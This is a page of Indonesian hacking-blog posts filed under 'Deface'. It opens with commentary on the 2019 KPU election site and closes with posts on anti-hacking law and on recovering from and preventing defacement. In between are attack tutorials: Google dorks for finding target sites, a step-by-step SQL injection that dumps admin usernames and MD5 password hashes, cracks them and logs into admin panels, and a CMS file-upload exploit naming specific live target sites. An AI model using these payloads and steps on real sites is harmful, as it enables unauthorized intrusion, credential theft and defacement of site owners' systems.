Articles by "Deface"
Showing posts with label Deface. Show all posts
            Hai sobat PHL, disini saya akan menjeleaskan tentang isu peretasan situs KPU yang di isukan penyebab kecurangan capres nomor 1, ingin tahu selengkap nya??, simak artikel ini.

           17 April 2019 adalah hari dimana rakyat indonesia menyampaikan suara nya lewat KPU, di hari itu rakyat indonesia berhak memilih pilihannya masing mulai dari Capres, DPR-RI, DPD-RI, dll,
          setelah semua itu di lakukan panitia pemilihan umum, mulai menghitung suara suara dari rakyat, awalnya Capres nomor 2 unggul 50% persen dari nomor 1, setelah itu 2-3 hari ada perubahan persen di situs KPU itu, disini Jokowi-Amin (54%) - Prabowo-Sandi (45%). 
          rakyat-rakyat yang mendukung nomor urut 2 itu tidak terima dengan alasan ada banyak kecurangan yang di lakukan oleh nomor urut 1 di antara banyak kecurangan itu adalah peretasam situs kpu.go.id, disini mereka tahu karna di situs kpu tersebut halaman awal tidak bisa di akses,             
         dengan kata lain jika memang ini peretasan maka ini namanya peretasan DDOS attack, tapi sebenarnya tidak di retas melainkan banyak pengunjung/client di situs kpu.go.id, sehingga server mengalami kewalahan dalam memberikan layanan untuk si client/pengunjung tersebut, Jadi jika ada yang berbicara tentang peretasan situs kpu itu adalah HOAX semata, 
        dan sebetulnya ada situs quick count yang di retas yaitu Indo Barometer, situs tersebut halaman awalnya di rubah dan di edit dengan kata Hacked, si peretas menggunakan metode SQLI,
Google Dork
Hai guys, kembali lagi di blog terkece terkeren terhitz se Indonesia, Jadi disini saya akan memberikan ilmu lagi kepada kalian yang belum tahu apa itu Google Dork, yang di artikel ini itu sangat penting bagi kalian yang ingin belajar Deface website, kalian harus tahu macam macam Google Dork , Ok langsung aja ke artikel nya


Macam Macam Google Dork :

1. inurl: seperti namanya, inurl berarti “di url” atau “dalam url” gunanya untuk mencari website yang di url-nya terdapat suatu string atau kata yang kita masukkan. Contoh: inurl:.blogspot maka yang akan muncul adalah site-site yang di urlnya mengandung “.blogspot” Sedangkan saudaranya inurl adalah “allinurl:”, maksudnya command tersebut digunakan untuk mencari keseluruhan nama domain website yang telah kita input/tentukan.

2. intitle: seperti namanya, intitle berarti “di judul” atau “dalam judul” fungsinya untuk mencari site yang artikelnya memuat judul sesuai yang kita inginkian. Contohnya di sini saya bikin dork intitle:”hack” hasilnya site yang judul postnya mengandung kata “hack” muncul. Intitle juga punya saudara lho :v sama seperti inurl, yaitu “allintext:” namun command tersebut tidak terlalu berpengaruh terhadap hasil pencarian, malah menurut saya memakai “intext:” lebih menguntungkan.

3. intext: nah kalau yang satu ini sifatnya lebih universal(umum) perintah ini sendiri artinya “di teks” atau “dalam teks” jadi, jika misalnya kita memasukkan dork intext:”avenged” di kotak pencarian google maka yang muncul adalah site yang mengandung kata “avenged” entah itu di url, judul, dll. Pokoknya semua yang mengandung kata “avenged” ditampilkan.

4. filetype: berarti “tipe file” kalo yang ini biasanya jarang dipake untuk heking-hekingan karena biasanya perintah ini buat donlot/nyari file dengan lebih spesifik sesuai kebutuhan kita seperti kalau kita sedang mencari lagu/ebook(nanti saya jelaskan di bawah) dan disini saya ambil contoh intext:”hacking” filetype:pdf maka hasil yang keluar adalah sekumpulan file pdf siap donlot dan karena saya kasih intext:”hacking” maka munculnya yang mengandung kata-kata/bertopik tentang “hacking”.

5. site: kalau yang ini berfungsi untuk mencari (Country domain) site yang kita tentukan, perintah ini juga sering digunakan sama heker untuk nentuin site negara mana yang pengen dia bobol dengan memasukan domain negaranya. Misalnya anda mau belanja online di webshop amerika maka dork yang harus anda buat kurang lebih seperti ini intext:”shop” site:.us.
Sebenernya gak harus .us tapi karena di sini contoh yang saya buat adalah site amerika, maka tentu saja domainnya adalah .us kalo misalnya site inggris ya site:.uk kalo misalnya site kanada ya site:.ca sebenernya perintah site: bisa digantikan dengan inurl: contohnya jika anda mau buka situs Dell inggris(uk) nah anda mungkin akan menulis inurl:dell site:.uk tapi anda juga bisa menggantinya jadi inurl:dell.co.uk. Namun jika kita hubungkan ke hal yang berbau carding,deface,dll. “inurl”: lebih sering digunakan untuk menentukan/mencari nama direktori website tersebut untuk diserang dan juga bisa menentukan ekstensi halaman, juga parameter.

link: kalau ini saya kurang paham, karena jujur ane sendiri sama sekali belum pernah make yang beginian, tapi menurut blog tetangga, perintah ini gunanya mencari keseluruhan link yang berada dalam satu website. o.O saya gagal paham terlebih lagi gak ada contohnya.
Nah setelah tau fungsinya kini saatnya anda coba mengembangkan dork sendiri ๐Ÿ˜€ jangan terus-terusan nyari di Mbah Google “Dork Carding” atau “Dork com_user” atau “Dork deface exploit joomla” dll. karena semua dork yang ada di Google itu PASARAN dan yang pasti gak cuma anda yang lihat kumpulan dork itu juga yang pasti dork pasaran itu gak “Fresh” atau gak “Perawan” karena sudah dipakai banyak orang selain anda.
Disini saya kasih satu contoh penggabungan/pengembangan dork, langkah pertama adalah IMAJINASI  seperti, anda mau lihat lirik lagu avenged-hail to the king di kapanlagi.com maka dork yang anda tulis kurang lebih inurl:kapanlagi intext:”avenged” “lirik” intitle:”hail to the king”
Dari contoh dork yang tadi (saat dimasukkan ke kotak pencari Google) seolah-olah anda berbicara dengan Google kurang lebih seperti ini: “Oy gel, gugel.. cariin gue site yang urlnya ada kata kapanlagi terus di situ ada tulisan avenged sama lirik nah terus judulnya hail to the king” nah seperti itulah gambaran sederhananya ๐Ÿ˜€ jika anda mencari di Google “Cara mengembangkan dork” maka saya jamin yang muncul Just Bullshit Tutorial, karena kunci mengembangkan dork hanyalah IMAJINASI. Maka anda harus imajinasikan dulu anda mau ngomong gimana sama google, terus baru di jadiin dork.
Sebenernya dork fungsinya gak hanya untuk kejahatan tapi juga bisa sangat bermanfaat untuk beberapa hal positif.
Oke..oke sekian dulu artikel saya ๐Ÿ˜€ jari saya juga dah gempor gara-gara ngetik ๐Ÿ˜€ ๐Ÿ˜€ tidak lupa saya ucapkan Terima Kasih kepada para pengunjung blog sederhana saya ๐Ÿ˜€ oke sekian.
Terima Kasih.
Cara Deface POC Lokmed
Hai guys, kembali lagi di blog terkece terkeren terhitz di Indonesia :v, eh malah kek atta :v, Ok lah tanpa basa basi kita langsung aja ke tutor nya

Bahan - Bahan :
1. Internet
2. Hp / Laptop

Ok guys kalau sudah ada bahan bahan nya langsung aja ke TKP...

Dorking dulu ya bos kalau belum tahu Dorking itu apa nanti saya upload ketika artikel ini sudah di upload

Dork :
- inurl:kategori-23-hiburan.html
- inurl:hal-tentang-kami.html
- inurl:statis-1-pengantar.html
- inurl:statis-19-beasiswa.html
- inurl:statis-22-kerjasama.html

Bagi kalian yang sudah tahu apa itu Google Dork bisa kalian kembangin lagi, saya cuman memberikan default nya, ok?

Kalau sudah ketemu target kita eksekusi menggunakan Exploit berikut ini
'union select /*!50000Concat*/(username,0x20,password)+from+users--+--+

Bagi kalian yang tidak tahu cara memasukan Exploit nya seperti apa bakalan saya ajarin jadi seperti di bawah ini..
Misal kalian nemuin web/target kek gini website.co.li/statis-1-tentang.html
Nah kita masukin Exploit nya itu di bagian sesudah angka satu itu, nah kalau angka nya beda gimana bang?, Ya nggak papa lu masukin aja Exploit nya di depan angka itu seperti berikut ini
website.co.li/statis-1'union select /*!50000Concat*/(username,0x20,password)+from+users--+--+-tentang.html
Nah seperti itu caranya,

Nah kelanjutan nya gimana bang?
Ok langsung aja langkah selanjutnya
Kalau sudah kalian lakukan cara diatas langkah selanjutnya adalah kalian view-source website nya yang tadi menggunakan ctrl+u / view-source: website.co.li

Disini saya menggunakan hp jadi pakai chrome caranya
view-source:website.co.li/statis-1'union select /*!50000Concat*/(username,0x20,password)+from+users--+--+-tentang.html

Maka akan muncul seperti gambar berikut ini
Nah di title nya itu kan ada text + md5 Jadi yang text itu user name nya dan md5 nya itu password nya, terus gimana caranya bang supaya kita tahu apa isi password nya
Kalian tinggal masuk ke website di bawah ini
https://www.md5online.org/md5-decrypt.html
Kalian masukan hash nya
Terus akan muncul text berwarna hijau seperti di bawah ini
Nah yang Found : ftik3nc4n4007 
Itu Password nya, nah gimana cara kita login?
Disini kita bermain feeling :v
Ea feeling
Admin page default nya sih disini
1. web.co.li/index.php/adminweb
2. web.co.li/redaktur
3. we.co.li/administrator
4. web.co.li/adminweb
5. web.co.li/admin

Nah kalian tinggal login deh
Dan boom
Selamat kalian sudah masuk ke dalam server nya
Assalamualaikum sahabat PHL ๐Ÿ™‚ Ketemu sama saya lagi nih hhehe, pagi ini saya mau share tutorial deface yang ajib lagi, yaitu “CMS Webconstructor Remote File Upload Vulnerability” semoga bermanfaat ya karena saya yakin tutorial saya bermanfaat semua nya hhaha. Ok simak berikut ini.

Upload Vulnerability
Dork: intext:CMS: webconstructor.pl
Author: BadBoy
Category: Remote, Webapps
Tested on: Windows Xp SP3
===============================================
-> Exploit <-
http://[localhost]/PATH/tiny_mce/plugins/filemanager/InsertFile/insert_file.php
-> Allowed File <-
You can upload ,html ,pdf ,ppt ,txt ,doc ,jpg, etc except php, php4, asp
-> Preview <-
– You can see if you success upload file.
-> Live Target <-
– http://mexico-extreme.com/tiny_mce/plugins/filemanager/InsertFile/insert_file.php
– http://rofel.pl/tiny_mce/plugins/filemanager/InsertFile/insert_file.php
===============================================
Sudah cukup begitu, saya rasa kalian sudah mengerti bagaimana cara eksekusi nya hehe, kalau yang bingung? Komen aja di bawah, InsyaAllah saya feedback dengan cepat ๐Ÿ˜‰
Semoga bermanfaat aja ya, Wassalamualaikum



Deface merupakan kegiatan menyisipkan file atau mengubah tampilan suatu website secara paksa. Deface menerobos masuk ke dalam system tanpa ijin dan beresiko terkena hukum.


Kasus serangan deface di indonesia cukup parah. Ratusan bahkan ribuan website - blog mengalami serangan deface setiap harinya. Website yang terkena serangan deface bukan hanya dari indonesia saja, melainkan website negara lain, namun pelakunya dari indonesia.


Apa tujuan mereka melakukan deface?

Yang pertama sudah pasti jelas untuk ajang pamer skill mereka.
Yang kedua untuk mendapat pengakuan dari peretas / defacer lain bahwa mereka hebat dalam melakukan peretasan.

Untuk tujuan tertentu seperti membalaskan dendam, demo kepada pemerintah, tidak senang dengan suatu produk atau layanan, dll


Lalu apa hukum dalam deface itu.


Pasal 406 KUHP


a.     Hacker yang menerapkan hacking dapat dikenakan pasal tersebut. Tindakan hacking yang dapat dikenai pasal ini adalah hacking yang memiliki dampak bagi korbannya seperti deface (merubah halaman asli situs), membuat website atau sistem korban tidak dapat berfungsi sebagaimanamestinya.Dapat dipahami dari pasal di atas, bagi para pelaku hacking yanghanya sekedar menyusup, mengintai, melihat-lihat, menggunakankomputer korban tanpa menimbulkan kerusakan tidak akan ter-cover oleh pasal ini.


b.    Khusus untuk hacking dengan deface website target dapat dikenakan pula Undang-Undang No. 36 Tahun 1999 tentang Telekomunikasi Pasal 1 angka (1). Seperti yang dikenakan pada Dani Firmansyah yang melakukan deface situs tabulasi pemilu tahun 2004 yang lalu.


Tidak hanya pada kasus pembobolan situs KPU pada tahun 2004, sebelum disahkannya UU ITE, seringkali UU Nomor 36 Tahun 1999 ini digunakan untuk menjerat para pelaku kejahatan di dunia maya oleh parahakim dalam mengadili terdakwa.


c.  Pasal 22 UU No.36 Tahun 1999 tentang Telekomunikasi.


Setiap orang dilarang melakukan perbuatan tanpa hak, tidak sah, atau memanipulasi:


a. akses ke jaringan telekomunikasi; dan atau


b. akses ke jasa telekomunikasi; dan atau


c. akses ke jaringan telekomunikasi khusus.


Pasal ini lebih tegas menyebutkan bahwa kegiatan hacking dapat menimbulkan akibat hukum. Pasal ini mengatur bahwa setiap orang dilarang melakukan perbuatan tanpa hak, tidak sah, atau memanipulasi: pertama, akses ke jaringan telekomunikasi. Kedua, akses ke jasa telekomunikasi. Ketiga, akses ke jaringan telekomunikasi khusus.


Undang-Undang ITE


Pasal 30


Setiap Orang dengan sengaja dan tanpa hak atau melawan hukum mengakses Komputer dan/atau Sistem Elektronik milik Orang lain dengan cara apa pun.Setiap Orang dengan sengaja dan tanpa hak atau melawan hukum mengakses Komputer dan/atau Sistem Elektronik dengan cara apa pun dengan tujuan untuk memperoleh Informasi Elektronik dan/atau Dokumen Elektronik.Setiap Orang dengan sengaja dan tanpa hak atau melawan hukum mengakses Komputer dan/atau Sistem Elektronik dengan cara apa pun dengan melanggar, menerobos, melampaui, atau menjebol sistem pengamanan.


Pasal 46


1.  Setiap Orang yang memenuhi unsur sebagaimana dimaksud dalam Pasal 30 ayat (1) dipidana dengan pidana penjara paling lama 6 (enam) tahun dan/atau denda paling banyak Rp600.000.000,00 (enam ratus juta rupiah).


2.  Setiap Orang yang memenuhi unsur sebagaimana dimaksud dalam Pasal 30 ayat (2) dipidana dengan pidana penjara paling lama 7 (tujuh) tahun dan/atau denda paling banyak Rp700.000.000,00 (tujuh ratus juta rupiah).


3.      Setiap Orang yang memenuhi unsur sebagaimana dimaksud dalam Pasal 30 ayat (3) dipidana dengan pidana penjara paling lama 8 (delapan) tahun dan/atau denda paling banyak Rp800.000.000,00 (delapan ratus juta rupiah)


4. Jadi siapa saja yang melakukan hacking ke suatu sistem komputer tidak sesuai prosedur dengan pasal 22 ini, akan dikenakan pasal 50 yang berbunyi “Barangsiapa yang melangggar ketentuan sebagaimana dimaksud dalam pasal 22, dipidana dengan pidana penjara paling lama 6 (enam) tahun dan/atau denda paling banyak Rp. 600.000.000,- (enam ratus juta rupiah).”


Banyak defacer yang memposting hasil defacenya di media sosial.

tanpa mereka sadar mereka sudah melangar hukum namun mereka membuka jalan pihak berwajib untuk mengawasinya.



 Deface adalah teknik mengganti atau menyisipkan file pada server, teknik ini dapat dilakukan karena terdapat lubang pada sistem security yang ada di dalam sebuah aplikasi. Hal ini bertujuan untuk melakukan perubahan tampilan pada website korban dengan tampilan yang dimiliki oleh si defacer. Deface merupakan sebuah serangan yang dilakukan untuk mengganti visual dari sebuah website. Para hacker biasanya meninggalkan pesan dan nickname mereka agar hasil kerjanya diketahui oleh khalayak hacker.

1. Cara mengatasi website/blog yang terkena deface Download source & database yang ada diwebsite untuk backup. Hal ini berjaga-jaga apabila langkah yang kita lakukan gagal, tetapi apabila konfigurasi & lengkap dijamin 100% berhasil, terkecuali ada sesuatu yang terlewatkan.Download source CMS versi terbaru dari website penyedia CMS, misalkan : drupal, joomla, wordpress, dsb.Lakukanlah perbaikan database secara lokal, berjaga-jaga apabila backdoor ada di database. Biasanya didalam database ada acces user tidak dikenal yang akses levelnya sama dengan Administrator.Install CMS yang tadi sudah didownload diweb hosting. Kemudian lakukanlah konfigurasi : database, file permission, directory permission. Jangan menggunakan default configuration, modifikasilah konfigurasi-konfigurasi yang ada agar lebih powerfull.Kemudian instalasi component: Themes, Plugin, Component, dsb. Gunakanlah yang paling update, atau source baru dari komponen yang akan diinstall(Fresh Install Component).Kemudian update database, dengan login ke Database Control Panel(phpmyadmin, DB Admin, cPanel Database, dsb). Setelah melakukan login, maka importlah database. Gantilah username Administrator & Password menggunakan nama yang lebih Unik, jangan menggunakan user (admin, administrator, adm1n, dsb) gunakanlah yang lebih powerfull dan susah untuk ditebak untuk menghindari bruteforce, gunakanlah alias untuk menampilkan username administrator di web content.

 2. Cara untuk menanggulangi kasus deface Penggunaan Firewall. Tujuan utama dari firewall adalah untuk menjaga agar akses dari orang tidak berwenang tidak dapat dilakukan. Program ini merupakan perangkat yang diletakkan antara internet dengan jaringan internal. Informasi yang keluar dan masuk harus melalui atau melewati firewall. Firewall bekerja dengan mengamati paker Intenet Protocol (IP) yang melewatinyaWajib untuk mengikuti perkembangan source dari source website yang digunakan, backuplah website dan database sebelum dilakukan update.Kebanyakan defacer telah memasang backdoor ketika telah berhasil melakukan deface website, hal ini dimungkinkan agar dapat melakukan deface ulang terhadap website. Wajib untuk memeriksa perubahan folder, file, database dan source terakhir dari websitePelajarilah lebih dalam mengenai dasar-dasar hacking dan antisipasinya, contoh hacking yaitu SQL Injection.Hardening website dan source wajib dilakukan, misalkan jangan menggunakan ”default configuration”, aturlah sedemikian rupa ”configuration website” dengan memperhatikan: permission, acces level, indexiding, database configuration, password dan user management.Gunakanlah tambahan plugin / component yang tepat, sehingga dapat meminimalisasi terjadinya kegiatan defacing dari thirdparty. Pastikan hasil review & ranking plugin bereputasi baik dan sudah diverified oleh penyedia CMS yang bersangkutan.Lakukanlah penetration testing terhadap website, baik secara lokal maupun langsung di website. Banyak tools penetration testing yang bisa digunakan: Nexus, Acunetix, dsb.